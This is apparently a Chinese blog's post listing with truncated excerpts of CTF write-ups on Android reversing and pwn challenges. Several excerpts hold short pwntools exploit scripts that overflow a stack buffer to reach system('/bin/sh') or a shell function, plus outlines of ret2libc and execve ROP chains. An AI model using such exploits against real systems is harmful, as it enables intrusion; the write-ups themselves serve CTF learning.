自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

原创 Xman签到题

反编译后找到MainActivity,关键代码如下:可以看出将输入字符串加密取反后与=kFBUShIf5IBT9GHfCEy比较进入MyBase()这里把base64的编码表改了,可以先将字符串还原为默认base64在解密脚本如下:import base64bs_str = "=kFBUShIf5IBT9GHfCEy"[::-1]strbase=''base_table=''b...

2019-04-07 16:23:19 264

原创 pwn7第七关

前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...

2019-04-03 23:20:46 406

原创 pwn3第三关

溢出点,保护都和上一关一样,这一关有外部函数system()和字符串/bin/sh,exp如下:from pwn import *elf=ELF('./pwn3')p=process('./pwn3')payload='a'*112+p32(elf.plt['system'])+p32(0x11111111)+p32(0x08048720)#0x111111是返回地址,0x080487...

2019-03-30 15:21:25 239

原创 pwn2第二关

在这一关中,没有可以直接利用的system()函数让我们直接调用了。我们可以学习使用系统调用来进行操作。首先看一下保护情况,只开了NX,同样是get()存在溢出syscall的函数调用规范为execve("/bin/sh",0,0)汇编语句如下pop ax # 系统调用号载入, execve为0xbpop bx #/bin/shpop cx #0pop dx ...

2019-03-29 11:57:13 335

原创 pwn1第一关

检查程序,发现是32位,开了NX保护拖入ida32get()存在溢出,gdb调试偏移112字节后覆盖返回地址,程序本身有调用system函数,exp如下:from pwn import *p=process('./pwn1')payload='a'*112+p32(0x0804863A)p.recvline()p.sendline(payload)p.interactive(...

2019-03-28 21:31:21 465

原创 [pwn]bugku pwn2

首先检查了一下保护机制,发现几乎啥保护都没有,ida查看一下read()函数存在溢出,然后又看了一下发现main函数下面有一个get_shell_函数,点进去看了看应该是让返回地址覆盖成getshell地址,gdb看一下偏移rbp前四位为bAA1,算一下偏移到rbp偏移为48,向上8字节是父函数rbp,所以偏移56覆盖到返回地址,get_shell_地址为exp如下:from pwn ...

2019-03-26 16:46:35 5515 4

原创 Bugku Timer(阿里CTF)

这是一道安卓题,大致意思是过二十万秒后给出flag,关键代码如上,可以写个脚本模拟过完二十万秒,输出k,package com.test;public class text { public static void main(String[] args) { int k = 0; for(int time =200000;time>0;time-...

2019-02-28 21:43:25 1311

原创 Bugku 游戏过关

打开以后不知道是个什么游戏,拖入ida,查看字符串,看到双击进入查看交叉引用,定位关键代码,看样子是个函数,记下偏移地址,od打开,跟踪的输入随便输入,在下面随便找个跳转调到偏移e940出,程序输出flag...

2019-02-28 20:37:33 545

原创 Bugku easy_re

od搜索直接出flag

2019-02-28 20:13:10 288

原创 Bugku easy_vb

拖入od,搜索字符串直接出来,

2019-02-28 20:10:48 670

原创 Bugku 入门逆向

ida查看,不要f5,r键出结果

2019-02-28 19:52:46 864

原创 一个简单的Android Crackme分析(二)

一个简单的Android Crackme分析(二)首先,安装apk,adb install xx.apk,运行apk,随便输入,提示错误,把apk拖入Androidkiller,反编译成功,搜索关键字错误:根据name查找id搜索id定位关键点smali代码如下.method public onClick(Landroid/view/View;)V .locals 4 .p...

2019-02-12 17:16:42 404

原创 一个简单的Android Crackme分析

一个简单的Android Crackme分析首先将apk拖入Androidkiller,不知道什么原因报错,一开始以为是apktool版本太老,更新版本后依旧报错,如果有大佬知道原因还望告知,如图:既然Androidkiller用不了,那就用dex2jar手动编译,将dex解压,打开cmd输入d2j-baksmali.bat classes.dex,反编译成功,接着输入d2j-dex2jar...

2019-02-11 17:38:27 678

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除